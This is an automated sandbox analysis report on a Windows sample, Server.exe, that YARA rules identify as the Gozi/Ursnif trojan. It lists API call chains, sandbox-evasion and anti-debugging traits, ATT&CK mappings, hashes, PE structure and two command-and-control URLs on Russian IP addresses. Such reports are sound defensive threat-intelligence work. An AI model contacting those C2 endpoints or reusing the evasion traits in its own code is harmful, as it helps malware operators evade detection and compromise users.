    Source: 00000000.00000003.406142288.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 | reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.406142288.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 | reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: Process Memory Space: Server.exe PID: 5744, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_fd494041 | reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: Process Memory Space: Server.exe PID: 5744, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_261f5ac5 | reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: C:\Users\user\Desktop\Server.exe | Code function: 0_2_020216DF
    Source: C:\Users\user\Desktop\Server.exe | Code function: 0_2_0202832C
    Source: C:\Users\user\Desktop\Server.exe | Code function: 0_2_02021D8A
    Source: C:\Users\user\Desktop\Server.exe | Code function: 0_2_0040110B GetProcAddress,NtCreateSection,memset
    Source: C:\Users\user\Desktop\Server.exe | Code function: 0_2_00401459 NtMapViewOfSection
    Source: C:\Users\user\Desktop\Server.exe | Code function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError
    Source: C:\Users\user\Desktop\Server.exe | Code function: 0_2_0202421F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
    Source: C:\Users\user\Desktop\Server.exe | Code function: 0_2_02028551 NtQueryVirtualMemory
    Source: C:\Users\user\Desktop\Server.exe | Code function: 0_2_01FC1C58 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError
    Source: Server.exe | ReversingLabs: Detection: 35%
    Source: Server.exe | Virustotal: Detection: 46%
    Source: Server.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Server.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\Server.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
    Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@1/2
    Source: C:\Users\user\Desktop\Server.exe | Code function: 0_2_020230D5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
    Source: C:\Users\user\Desktop\Server.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 events)
    Source: C:\Users\user\Desktop\Server.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

    Data Obfuscation

    Source: C:\Users\user\Desktop\Server.exe | Unpacked PE file: 0.2.Server.exe.400000.0.unpack
    Source: C:\Users\user\Desktop\Server.exe | Unpacked PE file: 0.2.Server.exe.400000.0.unpack .text:ER;.data:W;.comu:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
    Source: C:\Users\user\Desktop\Server.exe | Code function: 0_2_0202831B push ecx; ret 0_2_0202832B
    Source: C:\Users\user\Desktop\Server.exe | Code function: 0_2_02027F30 push ecx; ret 0_2_02027F39
    Source: Server.exe | Static PE information: section name: .comu
    Source: C:\Users\user\Desktop\Server.exe | Code function: 0_2_00401000 LoadLibraryA,GetProcAddress

    Hooking and other Techniques for Hiding and Protection

    Source: Yara match | File source: 00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406328098.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406192981.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406310298.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406101502.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406169699.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406228836.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406261787.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406142288.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: Process Memory Space: Server.exe PID: 5744, type: MEMORYSTR
    Source: C:\Users\user\Desktop\Server.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Server.exe | Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Users\user\Desktop\Server.exe | Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
    Source: C:\Users\user\Desktop\Server.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
    Source: C:\Users\user\Desktop\Server.exe | API call chain: ExitProcess graph end node

    Anti Debugging

    Source: C:\Users\user\Desktop\Server.exe | Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
    Source: C:\Users\user\Desktop\Server.exe | Code function: 0_2_00401000 LoadLibraryA,GetProcAddress
    Source: C:\Users\user\Desktop\Server.exe | Code function: 0_2_01FC0D90 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Server.exe | Code function: 0_2_01FC092B mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Server.exe | Code function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError
    Source: C:\Users\user\Desktop\Server.exe | Code function: 0_2_01FC1C58 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError
    Source: C:\Users\user\Desktop\Server.exe | Code function: 0_2_02023BD3 cpuid
    Source: C:\Users\user\Desktop\Server.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: C:\Users\user\Desktop\Server.exe | Code function: 0_2_004015B0 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError
    Source: C:\Users\user\Desktop\Server.exe | Code function: 0_2_00401D68 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError
    Source: C:\Users\user\Desktop\Server.exe | Code function: 0_2_02023BD3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree

    Stealing of Sensitive Information

    Source: Yara match | File source: 00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406328098.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406192981.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406310298.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406101502.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406169699.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406228836.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406261787.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406142288.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: Process Memory Space: Server.exe PID: 5744, type: MEMORYSTR

    Remote Access Functionality

    Source: Yara match | File source: 00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406328098.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406192981.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406310298.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406101502.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406169699.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406228836.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406261787.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.406142288.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: Process Memory Space: Server.exe PID: 5744, type: MEMORYSTR
    MITRE ATT&CK Matrix (number of matching signatures in parentheses)

    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
    Execution: Windows Management Instrumentation (2); Native API (12); At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
    Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
    Privilege Escalation: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
    Defense Evasion: Virtualization/Sandbox Evasion (1); Obfuscated Files or Information (1); Software Packing (21); Binary Padding; Software Packing; Steganography; Compile After Delivery; Indicator Removal from Tools
    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
    Discovery: System Time Discovery (1); Security Software Discovery (1); Virtualization/Sandbox Evasion (1); Process Discovery (1); Account Discovery (1); System Owner/User Discovery (1); Remote System Discovery (1); System Information Discovery (124)
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
    Collection: Archive Collected Data (11); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
    Command and Control: Encrypted Channel (2); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
    Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
    Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
    Impact: Data Encrypted for Impact (1); Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

    Source | Detection | Scanner | Label
    Server.exe | 36% | ReversingLabs | Win32.Trojan.Generic
    Server.exe | 46% | Virustotal |
    Server.exe | 100% | Joe Sandbox ML |
    No Antivirus matches
    Source | Detection | Scanner | Label
    0.2.Server.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7
    0.2.Server.exe.2020000.2.unpack | 100% | Avira | HEUR/AGEN.1245293
    No Antivirus matches
    Source | Detection | Scanner | Label
    http://193.23 | 0% | Avira URL Cloud | safe
    http://62.173.142.81/drew/vtZ_2FDIi/MRLim5q_2FPOOIVwJV5p/mDG55l02bkwr36hqtHV/_2BXyU_2BkyUgVl9WIyeMc/2k07Y9nJ9nLtT/PcL77Drj/unLXMitiTeAgURShweMUOiB/jO6Gh6u4qj/R0YL8nr8_2Fe_2F8S/NmYC2zbFo_2F/_2F9OVp7R5L/glgHLP7bYaSidB/FZsufB1rfZCbhP2GWCC1X/tQ2Xe4zo9AyYJ7HA/jNvemogj1MfecHx/YKLEAqQON4Cy4b59f3/zq6LmLb43/Vud6lYhHL1LCLqJWQEpj/MZMy2z9wXkXjHl/Y_2BX.jlk | 0% | Avira URL Cloud | safe
    http://193.233.175.113/drew/qHKukbBQWu/Xw77sqXTqtrxRWpPD/yl9MR0Y2eNmn/GbsfhYjdl8H/5GaIgAKgHB90sh/aMn4M6bKKJciYELDTreaM/i8dqMbDS0rDZpO_2/F2s0PNMupq8bNg2/sWxA9_2FGI7DvJntWq/sJDzxIUTO/r8bT3UibSNEQXXaTJdFi/yG6uB8JAsWc6GRKrJig/fWv9nw4MT1weBq8HJPcdl7/ZF86bHFVi_2FJ/yinUV20K/IPPC4VuFn7ORSOMnH_2FY6_/2FwmfjECDI/_2B41PRFw9jRfkH5W/0EbKz9E3ebE/0M10.jlk | 0% | Avira URL Cloud | safe
    http://193.23 | 0% | Virustotal |
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    checklist.skype.com | unknown | unknown | false | | high
    Name | Malicious | Antivirus Detection | Reputation
    http://62.173.142.81/drew/vtZ_2FDIi/MRLim5q_2FPOOIVwJV5p/mDG55l02bkwr36hqtHV/_2BXyU_2BkyUgVl9WIyeMc/2k07Y9nJ9nLtT/PcL77Drj/unLXMitiTeAgURShweMUOiB/jO6Gh6u4qj/R0YL8nr8_2Fe_2F8S/NmYC2zbFo_2F/_2F9OVp7R5L/glgHLP7bYaSidB/FZsufB1rfZCbhP2GWCC1X/tQ2Xe4zo9AyYJ7HA/jNvemogj1MfecHx/YKLEAqQON4Cy4b59f3/zq6LmLb43/Vud6lYhHL1LCLqJWQEpj/MZMy2z9wXkXjHl/Y_2BX.jlk | true | Avira URL Cloud: safe | unknown
    http://193.233.175.113/drew/qHKukbBQWu/Xw77sqXTqtrxRWpPD/yl9MR0Y2eNmn/GbsfhYjdl8H/5GaIgAKgHB90sh/aMn4M6bKKJciYELDTreaM/i8dqMbDS0rDZpO_2/F2s0PNMupq8bNg2/sWxA9_2FGI7DvJntWq/sJDzxIUTO/r8bT3UibSNEQXXaTJdFi/yG6uB8JAsWc6GRKrJig/fWv9nw4MT1weBq8HJPcdl7/ZF86bHFVi_2FJ/yinUV20K/IPPC4VuFn7ORSOMnH_2FY6_/2FwmfjECDI/_2B41PRFw9jRfkH5W/0EbKz9E3ebE/0M10.jlk | true | Avira URL Cloud: safe | unknown
    Name | Source | Malicious | Antivirus Detection | Reputation
    http://193.23 | Server.exe, 00000000.00000002.513863268.00000000023BC000.00000004.00000010.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | low
    IP | Domain | Country | ASN | ASN Name | Malicious
    62.173.142.81 | unknown | Russian Federation | 34300 | SPACENET-ASInternetServiceProviderRU | true
    193.233.175.113 | unknown | Russian Federation | 8749 | REDCOM-ASRedcomKhabarovskRussiaRU | true
    Joe Sandbox Version: 37.0.0 Beryl
    Analysis ID: 830522
    Start date and time: 2023-03-20 13:12:45 +01:00
    Joe Sandbox Product: CloudBasic
    Overall analysis duration: 0h 5m 54s
    Hypervisor based Inspection enabled: false
    Report type: full
    Cookbook file name: default.jbs
    Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
    Number of new started processes analysed: 13
    Number of new started drivers analysed: 0
    Number of existing processes analysed: 0
    Number of existing drivers analysed: 0
    Number of injected processes analysed: 0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode: default
    Analysis stop reason: Timeout
    Sample file name: Server.exe
    Detection: MAL
    Classification: mal100.troj.evad.winEXE@1/0@1/2
    EGA Information:
    • Successful, ratio: 100%
    HDC Information:
    • Successful, ratio: 41.6% (good quality ratio 39.7%)
    • Quality average: 81.1%
    • Quality standard deviation: 27.9%
    HCA Information:
    • Successful, ratio: 98%
    • Number of executed functions: 44
    • Number of non-executed functions: 37
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
    • Excluded domains from analysis (whitelisted): fs.microsoft.com
    • Not all processes were analyzed, report is missing behavior information
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
      No simulations
    Match | Associated Sample Name / URL | Detection | Threat Name
    62.173.142.81 | server.exe | malicious | Ursnif
    62.173.142.81 | server_(3).exe | malicious | Ursnif
    No context
          No context
          No context
          No created / dropped files found
    File type: PE32 executable (GUI) Intel 80386, for MS Windows
    Entropy (8bit): 6.812179089793973
    TrID:
    • Win32 Executable (generic) a (10002005/4) 99.96%
    • Generic Win/DOS Executable (2004/3) 0.02%
    • DOS Executable Generic (2002/1) 0.02%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
    File name: Server.exe
    File size: 182272
    MD5: 9565b4a15a8593ea3ec1f3c9d0a2e11a
    SHA1: 0954c5387395f0552fa56f5b06b3bb159f0d430b
    SHA256: 3aa75da2773573786f07530f5a09b8e0aacd0402fd11e14d8067b5f4607bbd6a
    SHA512: 38c39811e09b664c70da24370fdc2cb555d698a1db868ed236d86c767cf5fb8751e8f5f1db667a4d807f6db39f8511b4753cfc59d9c85d0daa60ebef81a6adb8
    SSDEEP: 3072:iu7sH/YqGkGehHskiO+hMIPZSyqGr7tA0jtejRXwtig0:psfYq/72jhMIhSyzrh7jte9Oig
    TLSH: 16049EC392A07C51E4268A368E2FC2F4770DF891CE59AB66F3186F2F48BC172D562751
    File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............f.Q.f.Q.f.Q...Q.f.Q..4Q.f.Q...Q.f.Q..9Q.f.Q.f.Q.f.Q...Q.f.Q..0Q.f.Q..7Q.f.QRich.f.Q........PE..L....c.b...................
    Icon Hash: ba824242a5a2a28a
    Entrypoint: 0x402f31
    Entrypoint Section: .text
    Digitally signed: false
    Imagebase: 0x400000
    Subsystem: windows gui
    Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    DLL Characteristics: NX_COMPAT, TERMINAL_SERVER_AWARE
    Time Stamp: 0x62DB63E7 [Sat Jul 23 02:58:47 2022 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major: 5
    OS Version Minor: 1
    File Version Major: 5
    File Version Minor: 1
    Subsystem Version Major: 5
    Subsystem Version Minor: 1
    Import Hash: 2bf4bd16bd9a3948cc472dde1e8c8ccd
          Programming Language:
          • [C++] VS2010 build 30319
          • [ASM] VS2010 build 30319
          • [ C ] VS2010 build 30319
          • [IMP] VS2008 SP1 build 30729
          • [RES] VS2010 build 30319
          • [LNK] VS2010 build 30319
    Name | Virtual Address | Virtual Size | Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb84c | 0x3c | .text
    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9f000 | 0xdaf0 | .rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2b08 | 0x40 | .text
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x19c | .text
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
    .text | 0x1000 | 0xb1ae | 0xb200 | False | 0.5146374648876404 | data | 6.0249778256856334 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    .data | 0xd000 | 0x9098c | 0x13400 | False | 0.9474812297077922 | data | 7.860179869421139 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    .comu | 0x9e000 | 0x96 | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    .rsrc | 0x9f000 | 0xdaf0 | 0xdc00 | False | 0.41324573863636366 | data | 4.47773178292088 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    Name | RVA | Size | Type | Language | Country
    AFX_DIALOG_LAYOUT | 0xab598 | 0x2 | data | |
    TONIZITOHOWAPEVUMOBEM | 0xaaea0 | 0x598 | ASCII text, with very long lines (1432), with no line terminators | Sami Lappish | Finland
    TONIZITOHOWAPEVUMOBEM | 0xaaea0 | 0x598 | ASCII text, with very long lines (1432), with no line terminators | Sami Lappish | Norway
    TONIZITOHOWAPEVUMOBEM | 0xaaea0 | 0x598 | ASCII text, with very long lines (1432), with no line terminators | Sami Lappish | Sweden
    RT_CURSOR | 0xab5a0 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | |
    RT_CURSOR | 0xab6d0 | 0xf0 | Device independent bitmap graphic, 24 x 48 x 1, image size 0 | |
    RT_CURSOR | 0xab7c0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | |
    RT_ICON | 0x9f680 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Finland
    RT_ICON | 0x9f680 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Norway
    RT_ICON | 0x9f680 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Sweden
    RT_ICON | 0x9ff28 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Finland
    RT_ICON | 0x9ff28 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Norway
    RT_ICON | 0x9ff28 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Sweden
    RT_ICON | 0xa0ff8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Finland
    RT_ICON | 0xa0ff8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Norway
    RT_ICON | 0xa0ff8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Sweden
    RT_ICON | 0xa18a0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Finland
    RT_ICON | 0xa18a0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Norway
    RT_ICON | 0xa18a0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Sweden
    RT_ICON | 0xa3e48 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Finland
    RT_ICON | 0xa3e48 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Norway
    RT_ICON | 0xa3e48 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Sweden
    RT_ICON | 0xa4f20 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Sami Lappish | Finland
    RT_ICON | 0xa4f20 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Sami Lappish | Norway
    RT_ICON | 0xa4f20 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Sami Lappish | Sweden
    RT_ICON | 0xa5dc8 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Sami Lappish | Finland
    RT_ICON | 0xa5dc8 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Sami Lappish | Norway
    RT_ICON | 0xa5dc8 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Sami Lappish | Sweden
    RT_ICON | 0xa6490 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Sami Lappish | Finland
    RT_ICON | 0xa6490 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Sami Lappish | Norway
    RT_ICON | 0xa6490 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Sami Lappish | Sweden
    RT_ICON | 0xa69f8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Finland
    RT_ICON | 0xa69f8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Norway
    RT_ICON | 0xa69f8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Sweden
    RT_ICON | 0xa8fa0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Finland
    RT_ICON | 0xa8fa0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Norway
    RT_ICON | 0xa8fa0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Sweden
    RT_ICON | 0xaa048 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Sami Lappish | Finland
    RT_ICON | 0xaa048 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Sami Lappish | Norway
    RT_ICON | 0xaa048 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Sami Lappish | Sweden
    RT_ICON | 0xaa9d0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Sami Lappish | Finland
    RT_ICON | 0xaa9d0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Sami Lappish | Norway
